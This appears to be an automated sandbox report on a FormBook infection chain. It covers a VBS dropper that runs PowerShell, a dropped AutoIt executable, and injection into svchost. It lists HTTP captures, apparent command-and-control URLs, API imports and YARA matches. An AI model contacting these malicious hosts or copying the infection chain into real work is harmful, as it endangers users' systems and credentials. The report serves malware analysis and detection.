Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 20 Jan 2025 14:26:10 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4f c3 30 0c 85 ef fd 15 66 27 38 2c 2e 55 91 38 44 91 60 ed c4 a4 32 2a 48 0f 1c b3 c5 5b 2a 95 a6 24 29 15 ff 9e b4 13 d2 2e 96 9e fd 3d fb 99 df 14 6f 1b f9 59 97 f0 22 5f 2b a8 9b e7 6a b7 81 d5 1a 71 57 ca 2d 62 21 8b cb 24 63 29 62 b9 5f 89 84 9b f0 d5 09 6e 48 e9 28 42 1b 3a 12 79 9a c3 de 06 d8 da b1 d7 1c 2f cd 84 e3 02 f1 83 d5 bf b3 ef 5e 5c 31 51 25 7c 10 d2 10 38 fa 1e c9 07 d2 d0 bc 57 30 29 0f 7d e4 4e 33 07 b6 87 60 5a 0f 9e dc 0f 39 c6 71 98 37 b9 58 94 d6 8e bc 17 4f 83 3a 1a c2 8c e5 ec 21 83 db e6 30 f6 61 bc 83 8f c5 00 2a c0 34 4d ec 48 5d bc d0 aa 6e 7d 1e 5b 4d 9e 79 63 07 a8 ad 0b f0 98 72 fc df 15 23 2f 61 63 bc f9 c9 e4 0f 44 5e 7d e7 1f 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f0MAO0f'8,.U8D`2H[$).=oY"_+jqW-b!$c)b_nH(B:y/^\1Q%\|8W0)}N3`Z9q7XO:!0a*4MH]n}[Mycr#/acD^}0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 20 Jan 2025 14:26:13 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 65 6c 65 73 74 69 61 6c 2d 67 75 69 64 65 73 2e 73 68 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 11f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.celestial-guides.shop Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 20 Jan 2025 14:26:19 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a

Source: powershell.exe, 00000003.00000002.1471485301.000002490EED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1519430210.000002491D6A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.1471485301.000002490EE4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.1471485301.000002490CC51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.1471485301.000002490E7D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.1471485301.000002490EE4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: sxstrace.exe, 00000009.00000002.2696147303.000000000599A000.00000004.10000000.00040000.00000000.sdmp, sxstrace.exe, 00000009.00000002.2697999624.00000000077E0000.00000004.00000800.00020000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2695418379.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.chiro.live/9pz6?gp=1&js=1&uuid=1737383160.0003166288&other_args=eyJ1cmkiOiAiLzlwejYiLCAiY
Source: qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2696950833.0000000005264000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rtp189z.lat
Source: qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2696950833.0000000005264000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.rtp189z.lat/i4k3/
Source: qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2695418379.000000000367A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www70.chiro.live/
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000003.00000002.1471485301.000002490CC51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000003.00000002.1519430210.000002491D6A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1519430210.000002491D6A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1519430210.000002491D6A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: sxstrace.exe, 00000009.00000002.2696147303.0000000005808000.00000004.10000000.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2695418379.00000000034E8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000003.00000002.1471485301.000002490EE4F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: sxstrace.exe, 00000009.00000002.2696147303.00000000054E4000.00000004.10000000.00040000.00000000.sdmp, qVTSNa7tUPbuzPK.exe, 0000000C.00000002.2695418379.00000000031C4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2100834106.000000001D294000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://jackys.shop/5ann/?JZUdV=4PTBgoI4Nk
Source: wscript.exe, 00000000.00000003.1548696809.0000026A5C322000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550606306.0000026A5C32B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1549224199.0000026A5C32A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033z
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E1F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: sxstrace.exe, 00000009.00000002.2690176062.0000000002E4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: sxstrace.exe, 00000009.00000003.1990799324.0000000007A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000003.00000002.1471485301.000002490EED7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1519430210.000002491D6A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.1471485301.000002490E7D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.1471485301.000002490E7D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: wscript.exe, 00000000.00000003.1548696809.0000026A5C322000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550606306.0000026A5C32B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1549224199.0000026A5C32A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.atc-secure.com/
Source: wscript.exe, 00000000.00000003.1549451714.0000026A5C276000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550389292.0000026A5C2C7000.00000004.00000020.00020000.00000000.sdmp, doc00250120.Vbs.vbs	String found in binary or memory: https://www.atc-secure.com/exl04d3r
Source: wscript.exe, 00000000.00000003.1548696809.0000026A5C322000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550606306.0000026A5C32B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1549224199.0000026A5C32A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.atc-secure.com/exl04d3rI
Source: wscript.exe, 00000000.00000003.1548696809.0000026A5C322000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1550606306.0000026A5C32B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1549224199.0000026A5C32A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.atc-secure.com/exl04d3ra
Source: wscript.exe, 00000000.00000003.1549773517.0000026A5E455000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.atc-secure.com/exl04d3ry
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sxstrace.exe, 00000009.00000003.1995835502.0000000007ABE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443

Source: unknown

HTTPS traffic detected: 92.205.22.61:443 -> 192.168.2.7:49732 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_00E94164

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E94164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

5_2_00E94164

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E93F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

5_2_00E93F66

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00E8001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

5_2_00E8001C

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 5_2_00EACABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

5_2_00EACABC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2694334630.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1802111485.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2694722151.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801343865.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2696950833.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2694604263.0000000004860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1801650290.00000000039A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2689886267.0000000002980000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Binary is likely a compiled AutoIt script file

Source: powershell.exe, 00000003.00000002.1519430210.000002491D69B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_05a9485d-f
Source: powershell.exe, 00000003.00000002.1519430210.000002491D69B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_0f3cef86-b
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: This is a third-party compiled AutoIt script.	5_2_00E23B3A
Source: x.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: x.exe, 00000005.00000000.1467444928.0000000000ED4000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f5c50735-1
Source: x.exe, 00000005.00000000.1467444928.0000000000ED4000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_6d4ad186-1
Source: x.exe.3.dr	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_17543f1b-9
Source: x.exe.3.dr	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`	memstr_cb59bd94-8

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\script.ps1"			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0042CB93 NtClose,	6_2_0042CB93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B735C0 NtCreateMutant,LdrInitializeThunk,	6_2_03B735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72B60 NtClose,LdrInitializeThunk,	6_2_03B72B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_03B72DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_03B72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B74340 NtSetContextThread,	6_2_03B74340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B73090 NtSetValueKey,	6_2_03B73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B73010 NtOpenDirectoryObject,	6_2_03B73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B74650 NtSuspendThread,	6_2_03B74650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72BA0 NtEnumerateValueKey,	6_2_03B72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72B80 NtQueryInformationFile,	6_2_03B72B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72BF0 NtAllocateVirtualMemory,	6_2_03B72BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72BE0 NtQueryValueKey,	6_2_03B72BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72AB0 NtWaitForSingleObject,	6_2_03B72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72AF0 NtWriteFile,	6_2_03B72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72AD0 NtReadFile,	6_2_03B72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B739B0 NtGetContextThread,	6_2_03B739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72FB0 NtResumeThread,	6_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72FA0 NtQuerySection,	6_2_03B72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72F90 NtProtectVirtualMemory,	6_2_03B72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72FE0 NtCreateFile,	6_2_03B72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72F30 NtCreateSection,	6_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72F60 NtCreateProcessEx,	6_2_03B72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72EA0 NtAdjustPrivilegesToken,	6_2_03B72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72E80 NtReadVirtualMemory,	6_2_03B72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72EE0 NtQueueApcThread,	6_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72E30 NtWriteVirtualMemory,	6_2_03B72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72DB0 NtEnumerateKey,	6_2_03B72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72DD0 NtDelayExecution,	6_2_03B72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72D30 NtUnmapViewOfSection,	6_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72D10 NtMapViewOfSection,	6_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B73D10 NtOpenProcessToken,	6_2_03B73D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72D00 NtSetInformationFile,	6_2_03B72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B73D70 NtOpenThread,	6_2_03B73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72CA0 NtQueryInformationToken,	6_2_03B72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72CF0 NtOpenProcess,	6_2_03B72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72CC0 NtQueryVirtualMemory,	6_2_03B72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03B72C00 NtQueryInformationProcess,	6_2_03B72C00
